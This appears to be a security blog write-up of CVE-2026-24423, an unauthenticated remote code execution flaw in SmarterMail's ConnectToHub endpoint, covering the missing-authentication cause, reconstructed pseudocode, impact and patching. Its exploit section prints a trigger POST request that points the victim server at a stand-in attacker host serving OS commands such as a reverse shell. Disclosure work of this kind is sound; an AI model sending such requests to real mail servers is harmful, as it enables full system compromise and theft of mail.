CVE-2026-24423

The 'Hub' of All Evils: SmarterMail Unauth RCE

Amit Schendel
Amit Schendel
Senior Security Researcher

Jan 28, 2026·5 min read·14 visits

Executive Summary (TL;DR)

SmarterMail left the 'SystemAdminSettingsController.ConnectToHub' endpoint wide open. An attacker can send a request telling the mail server to connect to a malicious 'Hub' server controlled by the attacker. Upon connection, the malicious server feeds the mail server commands, which are executed with high privileges. It is a text-book unauthenticated RCE rated CVSS 9.3.

A critical authentication bypass in SmarterTools SmarterMail allows unauthenticated attackers to trick the server into executing arbitrary OS commands by abusing the 'ConnectToHub' API.

The Hook: When Smart Mail Acts Dumb

SmarterMail is the 'Exchange alternative' for people who don't want the headache of managing Microsoft Exchange but still want the headache of managing an enterprise mail server. It's widely used by hosting providers and small-to-medium businesses. Because it handles email, it is effectively the nervous system of an organization, sitting on sensitive data and usually enjoying high privileges on the host OS.

In January 2026, researchers uncovered a flaw that is almost charming in its simplicity. Usually, Remote Code Execution (RCE) requires a complex chain of memory corruption or a Rube Goldberg machine of deserialization gadgets. Not this time.

CVE-2026-24423 is a logic flaw in the High Availability (HA) features of SmarterMail. Specifically, the feature designed to let servers talk to a central management 'Hub' was implemented without checking who was asking to initiate the connection. It's the digital equivalent of a bank vault that opens if you just ask it nicely.

The Flaw: Missing Authentication (CWE-306)

The vulnerability resides in the SystemAdminSettingsController, specifically within a method called ConnectToHub. In a secure application, any controller labeled 'SystemAdmin' should be locked down tighter than a drum, requiring a valid session, an administrative cookie, or an API key.

However, the developers missed the [Authorize] attribute (or its equivalent internal check) on this specific endpoint. This means the API is publicly accessible to anyone who can reach the server's HTTP port.

But the flaw isn't just that the door is unlocked; it's what lies behind the door. The ConnectToHub method takes a URL or IP address as input. Its job is to reach out to that address and establish a management link. The fatal mistake was trusting that the input would point to a legitimate SmarterMail Hub. Instead, it allows an attacker to point the victim server to a malicious rogue server.

The Code: Anatomy of a Mistake

While the exact source code is proprietary, we can reconstruct the logic based on the behavior and the patch. The vulnerable controller likely looked something like this pseudocode:

// VULNERABLE CODE PATTERN
public class SystemAdminSettingsController : ApiController
{
    // OOPS: Missing [Authorize] or [AdminRequired] attribute here
    [HttpPost]
    public IActionResult ConnectToHub([FromBody] HubConnectionRequest request)
    {
        // The server blindly takes the URL from the attacker
        var hubUrl = request.HubUrl;
        
        // And initiates a connection to it
        var connection = new HubConnection(hubUrl);
        connection.Connect(); // Creates the outbound connection
        
        // If the 'Hub' sends back commands during handshake, they get executed
        connection.ProcessDirectives(); 
        
        return Ok();
    }
}

The fix was brutal and effective: they deleted the code. In Build 9511, the ConnectToHub and ValidateRemoteInstances endpoints were removed or completely refactored to ensure they could not be called without a rigorous authentication context. This is the 'scorched earth' approach to patching, which is often the safest bet.

The Exploit: Phoning Home to Hell

Exploiting this requires two moving parts: the attacker's client (to send the trigger) and the attacker's server (to emulate a malicious Hub).

Phase 1: The Setup The attacker sets up a simple HTTP server (Python or Go) that mimics the SmarterMail Hub protocol. This doesn't need to be a full implementation; it just needs to respond to the initial handshake with a payload.

Phase 2: The Trigger The attacker sends a POST request to the victim:

POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: mail.victim-corp.com
Content-Type: application/json
 
{
    "url": "http://attacker-ip:1337/evil-hub"
}

Phase 3: The Execution The victim server receives the request and, obeying the logic, initiates an HTTP connection to http://attacker-ip:1337/evil-hub. The attacker's server accepts the connection and responds with a configuration packet containing OS commands (e.g., spawning a reverse shell or adding a user).

Because the SmarterMail service typically runs as SYSTEM on Windows to manage network ports and files, the resulting shell is fully privileged.

The Impact: Why You Should Panic

This is a CVSS 9.3 for a reason. It is Unauthenticated (anyone on the internet can do it), Low Complexity (the exploit is just a web request), and High Impact (Complete System Compromise).

Once the attacker has RCE, the game is over. They can:

  1. Read all emails: Corporate espionage, password resets for other services, intercepting 2FA codes.
  2. Deploy Ransomware: Encrypt the mail store and demand payment.
  3. Pivot: Use the mail server as a beachhead to attack the internal network (Lateral Movement).

Since mail servers are often trusted by other internal systems (allow-listed in firewalls), they make excellent jump boxes.

The Fix: Patching the Hole

SmarterTools addressed this in Build 9511 (released Jan 15, 2026). If you are running an older version, you are vulnerable.

Remediation Steps:

  1. Update Immediately: Download and install the latest build from the SmarterTools website.
  2. Verify Version: Ensure your build number is >= 9511.
  3. Audit Access: Check IIS or application logs for requests to ConnectToHub originating from unknown IPs prior to patching. This indicates you may have already been compromised.

Strategic Mitigation: Even after patching, ask yourself: Why is my administrative interface exposed to the entire internet? Use firewall rules or IIS restrictions to limit access to /api/v1/settings/sysadmin endpoints to known internal management IPs/VPNs only.

Technical Appendix

CVSS Score
9.3/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS Probability
0.09%
Top 75% most exploited

Affected Systems

SmarterTools SmarterMail (All versions prior to Build 9511)

Affected Versions Detail

Product
Affected Versions
Fixed Version
SmarterMail
SmarterTools
< 100.0.9511Build 9511
AttributeDetail
CWE IDCWE-306 (Missing Authentication for Critical Function)
Attack VectorNetwork (AV:N)
CVSS v4.09.3 (Critical)
Privileges RequiredNone (PR:N)
ImpactRemote Code Execution (System)
Exploit StatusActive Research / High Risk
CWE-306
Missing Authentication for Critical Function

The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.

Vulnerability Timeline

SmarterTools releases Build 9511 with fix
2026-01-15
Vulnerability details publicly disclosed (watchTowr, VulnCheck, CODE WHITE)
2026-01-23

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.